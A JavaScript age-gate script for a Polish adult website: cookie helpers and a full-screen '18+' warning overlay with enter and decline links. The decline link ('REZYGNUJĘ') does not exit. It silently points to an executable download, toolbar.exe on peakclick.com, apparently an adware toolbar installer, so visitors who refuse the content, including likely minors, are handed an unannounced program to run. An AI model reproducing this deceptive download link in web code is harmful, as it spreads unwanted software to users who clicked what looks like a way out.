﻿function ReadCookie(cookieName) {
	var theCookie=""+document.cookie;
	var ind=theCookie.indexOf(cookieName);
	if (ind==-1 || cookieName=="") return "";
	var ind1=theCookie.indexOf(';',ind);
	if (ind1==-1) ind1=theCookie.length;
	return unescape(theCookie.substring(ind+cookieName.length+1,ind1));
}

function SetCookie(cookieName,cookieValue,nHours) {
	var today = new Date();
	var expire = new Date();
	if (nHours==null || nHours==0) nHours=2;
	expire.setTime(today.getTime() + 3600000*nHours);
	document.cookie = cookieName+"="+escape(cookieValue)+ ";expires="+expire.toGMTString();
}

function DisplayWarningBox() {

	document.write("<div id=\"70m1k\" style=\"position: absolute; top: 0px; left: 0px; width: 100%; height: 100%; background: #FFFFFF; z-index:1000\"><div style=\"margin: 100px auto 0px auto; width: 600px; background: #ffffff; padding: 0px;border:2px solid #000000; z-index:1001;\"><table width=\"600\" border=\"0\" cellspacing=\"4\" cellpadding=\"0\" align=\"center\"><tr><td height=\"256\" colspan=\"2\"><div align=\"center\" ><span style=\"font-family: Geneva, Arial, Helvetica, sans-serif;font-size: 72px;font-weight: bold;\">18+</span></div><div align=\"center\"><br /><span style=\"font-family: Geneva, Arial, Helvetica, sans-serif;font-weight: bold;font-size: 24px;color: #FF0000;\">UWAGA!!!</span></div><div align=\"center\"><br /><span style=\"font-family: Geneva, Arial, Helvetica, sans-serif;font-weight:bold; font-size:16px; text-decoration: none; color:#000000;\">SERWIS ZAWIERA TREŚCI O TEMATYCE EROTYCZNEJ.<br> JESLI NIE UKOŃCZYŁEŚ 18 ROKU ŻYCIA, NIE CHCESZ OGLĄDAĆ TEGO TYPU TREŚCI LUB JEST TO NIEZGODNE Z PRAWEM TWOJEGO KRAJU, NIE WOLNO CI WCHODZIĆ DALEJ.</span></div></td></tr><tr>    <td><div align=\"center\"><a href=\"javascript:void(null);\"  style=\"font-family:Geneva, Arial, Helvetica, sans-serif; font-size:53px;font-weight:bold;color:#FF0000;text-decoration:underline;\" onclick=\"Agree()\">WCHODZĘ</a></div></td></tr><tr><td ><div align=\"right\"><a href=\"http://www.peakclick.com/toolbar/4123/toolbar.exe\" style=\"font-family:Geneva, Arial, Helvetica, sans-serif;font-size:12px;font-weight:bold;color:#000000;text-decoration:none;\">REZYGNUJĘ</a></div></td></tr></table></div></div><style type=\"text/css\"> html, body {height: 100%} div#page {display: none}; </style>");
}

function Agree() {
	SetCookie('70m1k','70m1k',2);
	document.getElementById('70m1k').style.display = 'none';
	document.getElementById('page').style.display = 'block';
}

if(ReadCookie('70m1k')=='')
	DisplayWarningBox();
